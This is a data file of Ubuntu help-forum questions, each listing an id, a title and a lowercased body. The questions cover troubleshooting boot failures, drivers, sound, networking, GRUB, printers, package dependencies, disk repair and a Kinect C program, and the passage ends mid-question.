417964	using ubuntu fonts in a commercial website	i need some help i am working on a clients project and i always have been in love with ubuntu fonts and i would like to use the fonts for this commercial development purpose ( the site would be a e-commerce property site containing various properties in the state/country ( p.s this is a commercial site ) , please help ) thanks
417968	toshiba satellite c55d-a5170 starts to boot to 13.10 disk then halts . can not even install	i bought a satellite c55d-a5170 laptop with win 8.1. needless to say windows sucked so i tried to load ubuntu 13.10 . i went into the setup and set it to cms boot instead of eufi . to boot like a bios system . before and after this setting change it would start to boot to the cd and then give a message , something about halting cpu something . it went so fast i could not get it . simply halt and sit at a black screen . after setting it to cms boot i would get the little divinci man logo of the boot cd but it would still halt at the same point . i ca n't get it to boot to the disk to install , much less get through the install . any help or insight would be greatly appreciated . thank you .
417971	western digital hard drive in a usb rack : usb device not detected - 12.04	i had a look at some posts and answers but didnât find answer to my problem . i 'm trying to make my config detect a wd disk in a usb rack . the output of udevadm monitor -- udev : monitor will print the received events for : udev - the event which udev sends out after rule processing udev [ 75826.727904 ] remove /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.0/host10/target10:0:0/10:0:0:0/bsg/10:0:0:0 ( bsg ) udev [ 75826.727942 ] remove /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.0/host10/target10:0:0/10:0:0:0/scsi_generic/sg11 ( scsi_generic ) udev [ 75826.728178 ] remove /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.0/host10/target10:0:0/10:0:0:0/scsi_device/10:0:0:0 ( scsi_device ) udev [ 75826.728218 ] remove /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.0/host10/target10:0:0/10:0:0:0/scsi_disk/10:0:0:0 ( scsi_disk ) udev [ 75826.728449 ] remove /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.0/host10/target10:0:0/10:0:0:0/block/sdk/sdk1 ( block ) udev [ 75826.728503 ] remove /devices/virtual/bdi/8:160 ( bdi ) udev [ 75826.728726 ] remove /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.0/host10/target10:0:0/10:0:0:0/block/sdk ( block ) udev [ 75826.728871 ] remove /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.0/host10/scsi_host/host10 ( scsi_host ) udev [ 75826.728983 ] remove /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.0/host10/target10:0:0/10:0:0:0 ( scsi ) udev [ 75826.729065 ] remove /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.0/host10/target10:0:0 ( scsi ) udev [ 75826.729146 ] remove /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.0/host10 ( scsi ) udev [ 75826.729240 ] remove /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.0 ( usb ) udev [ 75826.729527 ] remove /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2 ( usb ) udev [ 75837.776493 ] add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2 ( usb ) udev [ 75837.777936 ] add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.0 ( usb ) udev [ 75837.778457 ] add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.0/host11 ( scsi ) udev [ 75837.778795 ] add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.0/host11/scsi_host/host11 ( scsi_host ) udev [ 75838.777536 ] add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.0/host11/target11:0:0 ( scsi ) udev [ 75838.777773 ] add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.0/host11/target11:0:0/11:0:0:0 ( scsi ) udev [ 75838.778045 ] add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.0/host11/target11:0:0/11:0:0:0/scsi_disk/11:0:0:0 ( scsi_disk ) udev [ 75838.778224 ] add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.0/host11/target11:0:0/11:0:0:0/scsi_device/11:0:0:0 ( scsi_device ) udev [ 75838.778620 ] add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.0/host11/target11:0:0/11:0:0:0/bsg/11:0:0:0 ( bsg ) udev [ 75838.778772 ] add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.0/host11/target11:0:0/11:0:0:0/scsi_generic/sg11 ( scsi_generic ) udev [ 75838.783367 ] add /devices/virtual/bdi/8:160 ( bdi ) udev [ 75838.932709 ] add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.0/host11/target11:0:0/11:0:0:0/block/sdk ( block ) udev [ 75839.025940 ] add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2:1.0/host11/target11:0:0/11:0:0:0/block/sdk/sdk1 ( block ) specifications : hp pavilion elite hpe-430 fr
417972	is there a web image gallery generator that will run on ubuntu ?	is there a web image gallery generator that will run on ubuntu ? what i 'm looking for is something that will take a set of images , create a javascript image gallery that i can then upload and embed on a web site i run . ideally embed onto a google blogger blog as well . i can place the pictures on a folder on my own web server , or elswhere . there are online services that do this , but they require that i host the pictures on other sites , and it gets to be a bit of a hassle having so many sites and logins and hosting services involved . it would be nice if i could just bundle everything up and put it on my web site , completely self contained . i came across this , but it requires adobe air , and , not only do i not really want to get involved with adobe , they stopped supporting air for linux after version 2.6 . i 'm hoping for something fairly user friendly . it 's not just me who will potentially build galleries . i found an old post from 2005 on ubuntu forums mentiong gthumb , but , unless i 'm missing something , it does n't create a slideshow style presentation , just creates a grid of pictures . or at the least , the options for customizing the look and feel of the gallery is very limited , and not in keeping with modern looks and feels . does such a thing exist ?
417976	how to connect computer to tv with hdmi ?	i am trying to connect my laptop with my tv using an hdmi cable . it has worked with an vga cable , but my problem is that the screen does appear , but it freezes and nothing happens . the screen is also too big to fit the tv screen . i have checked and the sound is working perfectly fine . any ideas on how to fix ? ( oh and the screen fits the built in laptop screen , but not the tv screen with hdmi cable )
417979	ubuntu wo n't function properly after upgrade to 12.10	i recently upgraded to 12.10 and it froze at configuring sudo so i shut it down and started it back up and it booted into 12.10 with one problem : i could n't connect to the internet via wired ethernet cable . i ca n't do the partial upgrade to fix it either . is there any reason why this happened or is there any way to fix it ? here are the specs : type : desktop replacement screen size : 15.4 inches screen resolution : 1280 x 800 bundled os : windows ( vista ) cpu family : core2 duo processor speed : 2.4 ghz system ram : 4 gb hard drive ( s ) : 160 gb ( total ) dimensions : 1.61 x 14.06 x 10.12 in weight : 6.31 lb
417983	how to update d-bus on ubuntu 12.04 ?	i 'm looking for a simple way to update or to install d-bus 1.6 or higher version on ubuntu 12.04 . when i install d-bus 1.8 package from the following link , unfortunately ubuntu does not start again after reboot . http : //www.linuxfromscratch.org/blfs/view/svn/general/dbus.html is there a simple way to install newer version on ubuntu ? thanks !
417993	ubuntu wo n't boot after bootcamp expansion	i have installed windows 7 on a bootcamp partition , i had only 50 gb assigned to the partition but recently i expanded it with camptune x , after finishing the expansion nor windows nor ubuntu would n't load , i fixed the windows loading by running the repair boot command from the windows 7 installation disk , now windows boots perfectly , but when choosing ubuntu os from the list of os 's i get the message can not find grldr in all devices , i 've done a lot of research about it and still have n't found a solution , i 've tried bootrepair cd , automatically boot solving from windows ( it does n't even detect theres another os ) , copying from the ubuntu 's c : / folder the `` wubildr . '' files and pasting them on the main c : / disk , nothing has worked yet.. so if anyone could lend me a hand over here would be amazing ! thank you !
417994	uploading offline data in server	how can i upload or see the offline data or files while logging into a telnet server in ubuntu via terminal ? is there any direct process ?
417996	problem installing ubuntu 12.04 desktop on sony vaio duo 13	i bought new sony vaio duo 13 canadian english keyboard layout with window 8.. i tried more than 5 times installing ubuntu 12.04 using external cd drive . it is not working on sony vaio duo 13 . but it working in all other pcs ... i disable safe boot and ubuntu installed in normal mode . but it ca n't find wireless when starting installation my touch pad also not working during installation process . but i connected internet using lan during installation . during installation it normally open in desktop mode . after installation complete it open in command prompt only . it is not open desktop environment . i already updated all packages .. and i also tried re installing ubuntu desktop ... i tried every thing ... but i am not able to get my ubuntu desktop environment.. previously i used sony vaio with ubuntu 12.04 desktop.. i want to install ubuntu 12.04 desktop because my website is hosted in ubuntu 12.10 so to develop my website i need ubuntu on laptop.. please some one help to resolve this problem ... .thanks in advance ... ... ... ..
417997	fan not working [ dell vostro ]	i 've spent hours searching but i had no luck with it . acpi -v : battery 0 : full , 100 % battery 0 : design capacity 5200 mah , last full capacity 3120 mah = 60 % adapter 0 : on-line thermal 0 : ok , 57.5 degrees c thermal 0 : trip point 0 switches to mode critical at temperature 99.0 degrees c cooling 0 : lcd 0 of 7 cooling 1 : processor 0 of 10 cooling 2 : processor 0 of 10 i used i8kfan to set the speed to 2 2 . but if the fan still does n't work and the if i8kfan again to check the status , i still get -1 0. i8kctl : 1.0 ( null ) dzbzs1s 56 -1 0 27660 0 0 -1 i tried fancontrol but it does n't detect pwm sensors . i am using ubuntu 13.10 .
417998	why ubuntu firewall not showing verbose ?	even ubuntu firewall in running mode , i am not getting the data . may i know why ? root @ ubuntu : ~ # sudo ufw status numbered status : inactive root @ ubuntu : ~ # service ufw start start : job is already running : ufw root @ ubuntu : ~ # sudo ufw status numbered status : inactive root @ ubuntu : ~ # sudo ufw status verbose status : inactive root @ ubuntu : ~ #
417999	how to customize grub menu entries ( e.g . the name ) ?	i want to change the names of my os 's in my grub and i want to change the default os ... my grub version is `` gnu grub1.99-21ubuntu3.14 '' i also want to know about any bugs that affect this gnu grub ... please be detailed but keep in mind i 'm not a programmer i do n't know very much i know how to operate terminal but thats about it ... please list instructions in a step to step bases ... . thank you very much the os i have installed are ubuntu 12.04 and kubuntu 12.04 both have had the latest security updates ... kubuntu installed memtest in the grub too ... .
418002	i ca n't install canon pixma mg2520 printer with ubuntu 12.04lts 64bit	i plugged the printer in , ubuntu recognized it in system settings but ca n't find a driver for it . i downloaded several driver files for linux , extracted them but still the same result . what am i doing wrong ? thanks
418005	openfire users login time	im using openfire 3.7.1 with mysql database on ubuntu 12.04 , i wolud like to know openfire users ( pidgin ) login time and logout time from admin console . please help .
418006	is ubuntu phone compatible with moto g	well i know ubuntu phone works for nexus ; however , i wanted to know , will it work on my `` moto g '' jelly bean 16gb..
418007	help with tts and setting up a hotkey	so i am new to ubuntu and i 'm trying to figure out how to set up a speech to text program something that will be easy to use i have been using a tutorialhttp : //hak5.org/episodes/haktip-51 but for some reason it will not work i 'm using ubuntu 13.10 and i need something that i can just highlight text set a hotkey shortcut like control f9 and i need a tutorial to be dummy proof i am very new to linux i know most people do n't like windows here but i used to use a program called natural reader software this or do something like that but for ubuntu
418008	installing language tool extention in libre office	installing language tool . got this error ! ! [ does it require to install java or something ? ] [ 1 ] ( com.sun.star.uno.runtimeexception ) { { message = `` [ jni_uno bridge error ] uno calling java method writeregistryinfo : non-uno exception occurred : java.lang.noclassdeffounderror : com/sun/star/task/xjobexecutor\x000ajava stack trace : \x000ajava.lang.noclassdeffounderror : com/sun/star/task/xjobexecutor\x000a\x0009at java.lang.classloader.defineclass1 ( native method ) \x000a\x0009at java.lang.classloader.defineclass ( classloader.java:800 ) \x000a\x0009at java.security.secureclassloader.defineclass ( secureclassloader.java:142 ) \x000a\x0009at java.net.urlclassloader.defineclass ( urlclassloader.java:449 ) \x000a\x0009at java.net.urlclassloader.access $ 100 ( urlclassloader.java:71 ) \x000a\x0009at java.net.urlclassloader $ 1.run ( urlclassloader.java:361 ) \x000a\x0009at ... .
418011	why is libyaml in ubuntu 10.04 lts server not being patched for security issues ?	i 'm running a 10.04 lts server and the lts wiki page shows it as being supported until 2015 . however , on the cve page for a security vulnerability in libyaml , the table states : ubuntu 10.04 lts ( lucid lynx ) : ignored ( reached end-of-life ) why is there a discrepancy here ?
418012	ca n't connect to wireless 13.10	i have ubuntu installed as the sole os on a t420 . before this i had installed the # ! distro ( and xubuntu before that ) and wireless worked seamlessly on either . my home hotspot shows up but when i click on it tries for a while before disconnecting . before going into the problem further , i wanted to double check that i entered the wifi password for my home network correctly . i went to edit connections > > wi-fi security and changed the key , but it is still not able to connect . so i think the password is definitely correct . i do n't understand why it ca n't connect now .
418013	making nvidia driver work under ubuntu	i want to be able to use hashcat ( and meaby even games ? ) with my graphic driver in linux , and i am having problems to make my nvidia driver work under ubuntu 12.4 . i saw a lot of guilds and article and install drivers and etc , in the end its not work and my broke my system twice on trying . the problem is that i got nvidia corporation gf108m [ geforce gt 630m ] and intel corporation 3rd gen core together on the laptop for 64 bit and my ubuntu is 32 bit . its seem that geforce gt 630m its not support by nvidia , and when i tried to load the drivers i always see 0 memory and nothing happen . i heard there is some open source that can be an alternative to the drivers ( or help them load ) but i got ta did n't found anything yet . someone got a similar problem and solve it ?
418014	thinkpad x61 ( 4965agn ) wireless not working	so i have had ubuntu for a while now and i have tried literally every solution online , but to no avail , there just seems to be no way to solve this problem : the wifi signal on my x61 is not strong ( 2 bars out of 3 ) and the speed is really low , so obviously there is a driver problem , and i know a lot of machines with the intel 4965 wireless card have the same problem . i know x61 is an old machine and ubuntu used to support it , i just do n't know if ubuntu stopped including drivers for older machines in the kernel after a certain version , and if this is just the way they do things around here ? ?
418016	no sound at all	no sound at all ... checked all the drivers and sound card , all are installed properly . checked through the ubuntu forms but the old solution ( adding the option snd-hda-model to lenovo sky in alsa.conf ) is not working . my internal audio devices are showing ( also in pulse audio control ) . there is no error being shown . also if i plug in headphones , there is a little sound that plays but not understandable , just beats and that too unclear . this is lenovo ideapad y510 -2008 model and is running only on ubuntu 13.10 drivers : alc888 00:1b.0 audio device : intel corporation 82801h ( ich8 family ) hd audio controller ( rev 03 ) subsystem : lenovo device 3d96 flags : bus master , fast devsel , latency 0 , irq 22 memory at feaf8000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : [ 50 ] power management version 2 capabilities : [ 60 ] msi : enable- count=1/1 maskable- 64bit+ capabilities : [ 70 ] express root complex integrated endpoint , msi 00 capabilities : [ 100 ] virtual channel capabilities : [ 130 ] root complex link kernel driver in use : snd_hda_intel also tried wyth 's solution http : //ubuntuforums.org/showthread.php ? t=870681 & page=15 but its old i guess , and all my drivers are already the right . and sudo alsa force-reload is n't working either . here 's complete information http : //www.alsa-project.org/db/ ? f=1cc118fa827da3bcc019a712f8ed827f1d71d8de ! ! # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ! ! alsa information script v 0.4.62 ! ! # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ! ! script ran on : sat feb 8 08:01:47 utc 2014 ! ! linux distribution ! ! -- -- -- -- -- -- -- -- -- ubuntu 13.10 \n \l distrib_id=ubuntu distrib_description= '' ubuntu 13.10 '' name= '' ubuntu '' id=ubuntu id_like=debian pretty_name= '' ubuntu 13.10 '' home_url= '' http : //www.ubuntu.com/ '' support_url= '' http : //help.ubuntu.com/ '' bug_report_url= '' http : //bugs.launchpad.net/ubuntu/ '' ! ! dmi information ! ! -- -- -- -- -- -- -- - manufacturer : lenovo product name : invalid product version : lenovo ideapad y510 firmware version : 06cn23ww ! ! kernel information ! ! -- -- -- -- -- -- -- -- -- kernel release : 3.11.0-12-generic operating system : gnu/linux architecture : i686 processor : i686 smp enabled : yes ! ! alsa version ! ! -- -- -- -- -- -- driver version : k3.11.0-12-generic library version : 1.0.27.2 utilities version : 1.0.27.1 ! ! loaded alsa modules ! ! -- -- -- -- -- -- -- -- -- - snd_hda_intel'
418017	deleted xfce accidently , is there a way to recover it without internet connection ?	i 'm running xubuntu , and removed xfce from the software manager ( face palm ) while trying to clear up space ( i believe this is what i did since i cant find any trace of xfce in the terminal ) . at the time it did n't affect anything . when i restart my computer the ubuntu load screen comes on like normal , then the log-in screen . when i enter my password a text box pops up that says `` : unable to launch `` startxfce4 '' x session -- - `` startxfce3 '' not found ; falling back to default session . '' upon pressing okay , another text box pops up that says `` failed to load session gnome '' with the only option to log out . i 'm stuck trying to re-install any gui from the terminal . also my internet is a wireless network that only works after logging into the internet provider 's site , which i 'm not sure i can do without a gui . any ideas or suggestions ?
418018	make 12.04 look like 10.04 , please !	i do n't like the 12.04 panel . is there a simple way to make it look like 10.04 which was perfect in its design ? i installed gnome-panel and followed the instructions but nothing happened .
418019	samba server 4 kubuntu 1204	i install samba server 4 , run and share file on my kubuntu 12.04 but how i acess from other windows laptop in my lan
418022	ubuntu 13.10 : stuck at installing system step	i tried installing ubuntu 13.10 x64 using usb on my dell studio 1555 , everything went fine until the final step . the installation process hangs once it reach the 'installing system ' step . please advise your valuable suggestions . regards ,
418023	how can i persistent disable left menu in nautilus ( f9 ) ?	when i press f9 left panel hiding , but only before nautilus restart .
418024	cant use wired or wireless after ubuntu 13.10 installation	i installed windows 8 on my hp laptop that time i faced no difficulty to connect using wired or wireless connection and everything happened automatically . now i installed ubuntu 13.10 and i ca n't connect to same modem using either of internet connections..my wi-fi touch switch is not working . i checked bios but ca n't find anything to switch wi-fi setup of laptop on . i tried rfkill command it showed result as : soft blocked : no hard blocked : yes
418026	will adblock plus work with ubuntu 13.10 ?	i have ordered a system76 desktop preloaded with ubuntu 13.10 and firefox . at apps.ubuntu.com/cat/applications/adblock-plus/ , it only shows `` ubuntu 10.04 '' under `` available versions . ''
418030	how to install downloaded jdk setup into ubuntu	i have an ubuntu11.04 , and i wanted to install jdk7 into ubuntu . so i downloaded the jdk7 setup for ubuntu11.04 . and i tried to install using 'sudo get-apt install packagename . but jdk is not installed it gives an error e : package not found . my downloaded jdk folder is on the desktop .
418034	can i mount and run an iso from my terminal ?	i broke my gui , and am trying to install an iso of windows i have . is it possible to do from the terminal ?
418040	is there any way to store file thumbnails in each partition ? ( xfce )	is it possible to persuade xubuntu to store file thumbnails for an external hard drive into the drive itself instead of the home folder ? benefits include avoiding the ~/.thumbnails folder to get too large and avoiding too much writing on an ssd internal drive . the external hdd in question is where i store several years worth of photography . i think even if i disable thumbnails in thunar , applications like gthumb still cause them to be generated .
418041	how do i install canon lbp 2900 laser jet printer on ubuntu 12.04 ?	how do i install canon lbp 2900 laser jet printer on ubuntu 12.04 please help
418042	wifi disconnected in dell inspiron 15r 5537 ubuntu 12.04	i have dell inspiron . i buy just 2 days ago i install when i update it after restart wifi disconnected and also firmware for linux kernel drivers fail to install . please tell me what to do i m worried about this plz help me .
418044	why does deleted files also appear in directory	for example consider that i have created a file temp.txt and delete it later , there is still an invisible file temp.txt~ of course i can delete it but why do i need to do it always , so how to avoid it..
418050	chrome do n't allow me to run opera mini simulator	can anybody to say me how to fix it ? i 'm using chrome 32 .
418054	how do i install latest graphviz ?	the default graphviz package is quite out of date . so i tried getting the latest package from : http : //www.graphviz.org/download_linux_ubuntu.php trying to install libgraphviz4 it complains about conflict with libcdt4 so i apt-get remove that , then it complains about conflict with libpathplan4 so i apt-get remove that , then it complains about conflict with libxdot4 so i apt-get remove that , then it complains ... dependency is not satisfiable : libgd2-noxpm ( > =2.0.36~rc1~dfsg ) |libgd2-xpm ( > =2.0.36~rc1~dfsg ) the closest package i could find is libgd2-xpm-dev 2.1.0-2 installing that does n't fix the problem . how do i install this ? the solution to the 'duplicate question ' which was tagged to this does not help . trying to install the package fails , and even suggests things in a loop . it is unclear to me why libgd2-xpm-dev 2.1.0-2 does n't satisfy the dependency anyway . $ sudo apt-get install libgd2-xpm reading package lists ... done building dependency tree reading state information ... done package libgd2-xpm is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : libgd2-xpm : i386 e : package 'libgd2-xpm ' has no installation candidate $ sudo apt-get install libgd2-xpm : i386 reading package lists ... done building dependency tree reading state information ... done package libgd2-xpm : i386 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : libgd2-xpm e : package 'libgd2-xpm : i386 ' has no installation candidate
418057	install rxtx under jdk	a java developer who want to send sms , may use smslib project . smslib requires to set up : javacomm library ( if it is windows plateform ) rxtx library ( if it is linux plateform ) by adding it in jdk library see documentation my question is : how can i set up rxtx library under ubuntu ? http : //www.rxtx.org http : //www.jcontrol.org/download/readme_rxtx_en.html
418058	why is n't my second hdmi alsa_output being detected at start-up ?	for some reason my audio output is n't being detected on boot-up or after issueing a pulseaudio -k command . which means i ca n't set it as the default playback device . the output for pactl list short sinks displays : 0 alsa_output.pci-0000_00_03.0.hdmi-stereo module-alsa-card.c s16le 2ch 44100hz idle 1 alsa_output.pci-0000_00_1b.0.analog-stereo module-alsa-card.c s16le 2ch 44100hz idle however , when i go in to the sound settings , it lists 3 devices : hdmi / displayport 2 ( this is what i need to use ) hdmi / displayport analogue output only once i 've selected hdmi / displayport 2 in the sound settings does the output of pactl list short sinks change to : 0 alsa_output.pci-0000_00_03.0.hdmi-stereo module-alsa-card.c s16le 2ch 44100hz idle 1 alsa_output.pci-0000_00_1b.0.analog-stereo module-alsa-card.c s16le 2ch 44100hz idle 2 alsa_output.pci-0000_00_03.0.hdmi-stereo-extra1 module-alsa-card.c s16le 2ch 44100hz idle at this point my ~/.config/pulse default-sink file now lists the -extra1 device as i 'd like . however , after typing pulseaudio -k ; everything ( including the default-sink file ) switches back to the analog output . presumably because it ca n't find the listed output . is there a reason where pulseaudio ca n't see this third output by default ? what 's sound manager doing to detect it ?
418060	make changes { resize } in linux installed partittion	i have installed linux in sda1 partition . i do n't have any other operating system other than linux in my pc . now i want to install some other operation system and sadly i do n't have enough space in other drives . i currently have 100mb allocated for linux but i think for my use 30gb will be enough , so i want to shrink the sda1 partition by 70gb . is it possible to resize sda1 partition without disturbing the files and my linux operating system ? here 's a screenshot of my setup :
418061	how to install amd graphics divers on hybrid system with intel onboard graphic card ?	i have installed ubuntu 12.04 on my pc , but without 2 amd graphics card on pcie . so i am using pc with intel graphics card which is on board so far . but i bought 2 amd graphics card hd7970 . but for computing purpose not for connecting and expanding monitors but really only for parallel computing . so it means that i want to stay on intel gr , was that there is some xorg.conf and needs to be edited . but i think in my case it has n't . because i have no monitors to connect to this 2 amd graphics card . am i right ? if there is answer to this question please direct me . if not i will be very gratefull for answer . and sorry for my english i am not the native speaker . thank you in advance for any answer .
418069	error runing tide sdk developer ( error : libjpeg.so.62 : can not open shared object file : no such file or directory` )	i have downloaded tidesdk 1.3.1 beta and tide developer 1.4.2 , when trying to open the tide developer app i get : could n't load file : /home/username/downloads/tidesdk-developer-1.4.2-linux-x86-64/runtime/1.3.1-beta/libtide.so , error : libjpeg.so.62 : can not open shared object file : no such file or directory what does this mean and how can i get the application running ? other similer problems where solved by installing the 32bit version of libjpeg62 with sudo apt-get install libjpeg62 : i386 but this still does not fix it .
418074	kinect output to find distance	i found out from one site that it is possible to find distance from the raw depth video output of the kinect through the 2 bytes assigned to a particular pixel as shown in this link - tutorial . based on this i written a code to find out the distance of the middle point form the kinect sensor .i compiled it and run the code on ubuntu and it is showing the output . the output is showing some values as distance . the values are coming around 150- > 1147 . i hope it is showing the distance in mm . but i am not sure it is right or wrong . i am providing the code below . please make me sure that it is correct or if changes are required please help me with this . thank you all ! code : # include < opencv/cv.h > # include < opencv/highgui.h > # include < stdio.h > # include `` libfreenect_cv.h '' int getdist ( iplimage *depth ) { int x = depth- > width/2 ; int y = depth- > height/2 ; printf ( `` width= % d and height % d \n '' , x , y ) ; int d = depth- > imagedata [ x*2+y*640*2+1 ] ; printf ( `` 1st value is % d \n '' , d ) ; d= d < < 8 ; d= d+depth- > imagedata [ x*2+y*640*2 ] ; return d ; } iplimage *glviewcolor ( iplimage *depth ) { static iplimage *image = 0 ; if ( ! image ) image = cvcreateimage ( cvsize ( 640,480 ) , 8 , 3 ) ; unsigned char *depth_mid = ( unsigned char* ) ( image- > imagedata ) ; int i ; for ( i = 0 ; i < 640*480 ; i++ ) { int lb = ( ( short * ) depth- > imagedata ) [ i ] % 256 ; int ub = ( ( short * ) depth- > imagedata ) [ i ] / 256 ; switch ( ub ) { case 0 : depth_mid [ 3*i+2 ] = 255 ; depth_mid [ 3*i+1 ] = 255-lb ; depth_mid [ 3*i+0 ] = 255-lb ; break ; case 1 : depth_mid [ 3*i+2 ] = 255 ; depth_mid [ 3*i+1 ] = lb ; depth_mid [ 3*i+0 ] = 0 ; break ; case 2 : depth_mid [ 3*i+2 ] = 255-lb ; depth_mid [ 3*i+1 ] = 255 ; depth_mid [ 3*i+0 ] = 0 ; break ; case 3 : depth_mid [ 3*i+2 ] = 0 ; depth_mid [ 3*i+1 ] = 255 ; depth_mid [ 3*i+0 ] = lb ; break ; case 4 : depth_mid [ 3*i+2 ] = 0 ; depth_mid [ 3*i+1 ] = 255-lb ; depth_mid [ 3*i+0 ] = 255 ; break ; case 5 : depth_mid [ 3*i+2 ] = 0 ; depth_mid [ 3*i+1 ] = 0 ; depth_mid [ 3*i+0 ] = 255-lb ; break ; default : depth_mid [ 3*i+2 ] = 0 ; depth_mid [ 3*i+1 ] = 0 ; depth_mid [ 3*i+0 ] = 0 ; break ; } } return image ; } int main ( int argc , char **argv ) { while ( cvwaitkey ( 100 ) ! = 27 ) { iplimage *image = freenect_sync_get_rgb_cv ( 0 ) ; if ( ! image ) { printf ( `` error : kinect not connected ? \n '' ) ; return -1 ; } cvcvtcolor ( image , image , cv_rgb2bgr ) ; iplimage *depth = freenect_sync_get_depth_cv ( 0 ) ; if ( ! depth ) { printf ( `` error : kinect not connected ? \n '' ) ; return -1 ; } cvshowimage ( `` rgb '' , image ) ; //int d = getdist ( depth ) ; printf ( `` value is % d \n '' , getdist ( depth ) ) ; cvshowimage ( `` depth '' , glviewcolor ( depth ) ) ; //glviewcolor ( depth ) } cvdestroywindow ( `` rgb '' ) ; cvdestroywindow ( `` depth '' ) ; //cvreleaseimage ( image ) ; //cvreleaseimage ( depth ) ; return 0 ; }
418077	duplicate file exists , while on updation shows on ubuntu 12.04 lts	updation error continuously shows , after sudo apt-get update , after hit 56 , stooped and error shows like 'duplicate file exists and 'sudo apt-get update ' to correct these problem ! but after doing this many time i 'm getting same result , please help me !
418078	install ubuntu 13.10 without losing data on d rive	i have 2 partition on my hdd one is having windows xp and other is having my personal data ( d ) i want to install ubuntu in d drive without loosing my personal data . i also have 10 gb free space on it .
418079	how to repair a hard drive file system used for samsung smart tv	i 'm having a problem with my hard drive i use for my samsung smart tv . apparently it is a known problem , as the samsung d-model tvs sometimes ruins the hard drivers file system , so i found a guide online on how to repair it . i had to get ubuntu and plug in the hard drive . i should have received an error message saying something like `` can not mount the driver i/o error '' , but i did n't . after this i should write the command `` sudo xfs_repair -l /dev/sdc '' ( i also tried with sdc1 ) in terminal . i did that , and got the message `` phase 1 find and verify superblock..bad primary superblock - bad magic number ! ! ! attempting to find secondary superblock ... sorry could not find valid secondary superblock . exiting now . '' i tried searching online for different things to do . i tried the following commands : sudo fdisk -l -- > giving me : disk /dev/sdc : 500.1 gb , 500107835392 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773116 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xd5f0e851 device boot start end blocks id system /dev/sdc1 2048 976769023 488383488 7 hpfs/ntfs/exfat ubuntu @ ubuntu : ~ $ sudo mount /dev/sdc i also tried : sudo badblocks /dev/sdc -- > it gave me : 1024 1025 1026 1027 and i tried : sudo fsck /dev/sdc -- > it gave me : fsck from util-linux 2.20.1 e2fsck 1.42 ( 29-nov-2011 ) fsck.ext2 : superblock invalid , trying backup blocks ... fsck.ext2 : bad magic number in super-block while trying to open /dev/sdc the superblock could not be read or does not describe a correct ext2 filesystem . if the device is valid and it really contains an ext2 filesystem ( and not swap or ufs or something else ) , then the superblock is corrupt , and you might try running e2fsck with an alternate superblock : e2fsck -b 8193 < device > ubuntu @ ubuntu : ~ $ sudo e2fsck -b 8193 /dev/sdc e2fsck 1.42 ( 29-nov-2011 ) e2fsck : bad magic number in super-block while trying to open /dev/sdc the superblock could not be read or does not describe a correct ext2 filesystem . if the device is valid and it really contains an ext2 filesystem ( and not swap or ufs or something else ) , then the superblock is corrupt , and you might try running e2fsck with an alternate superblock : e2fsck -b 8193 < device > i 'm a very inexperienced linux user and i have no idea what is wrong or how to fix it . i do not want to format my hard drive as i have important files on there . i would really appreciate some help .
418082	can not run monodevelop 4.2 with xsp4	gents , i 'm new on linux and i tried to start .net under ubuntu when i start debugging a sample from monodevelop asp.net app it gives the following error : could not launch web server . the `` xsp4 '' web server can not be started . from tty when running xsp4 it gives the following : missing method system.configuration.iconfigurationsectionhandler : :create ( object , object , xmlnode ) in assembly /usr/lib/mono/4.0/system.dll , referenced in assembly /usr/lib/mono/4.0/system.configuration.dll exception caught during reading the configuration file : system.missingmethodexception : method not found : 'system.configuration.iconfigurationsectionhandler.create ' . at system.configuration.clientconfigurationsystem.system.configuration.internal.iinternalconfigsystem.getsection ( system.string configkey ) [ 0x00000 ] in < filename unknown > :0 at system.configuration.configurationmanager.getsection ( system.string sectionname ) [ 0x00000 ] in < filename unknown > :0 at system.configuration.configurationmanager.get_appsettings ( ) [ 0x00000 ] in < filename unknown > :0 at mono.webserver.xsp.server.get_appsettings ( ) [ 0x00000 ] in < filename unknown > :0 at mono.webserver.xsp.server+applicationsettings..ctor ( ) [ 0x00000 ] in < filename unknown > :0 xsp4 listening on address : 0.0.0.0 root directory : /home/tarik/documents/courses/mono/asp.net/firstapp error : system.typeinitializationexception : an exception was thrown by the type initializer for system.net.sockets.socket -- - > system.invalidcastexception : can not cast from source type to destination type . at 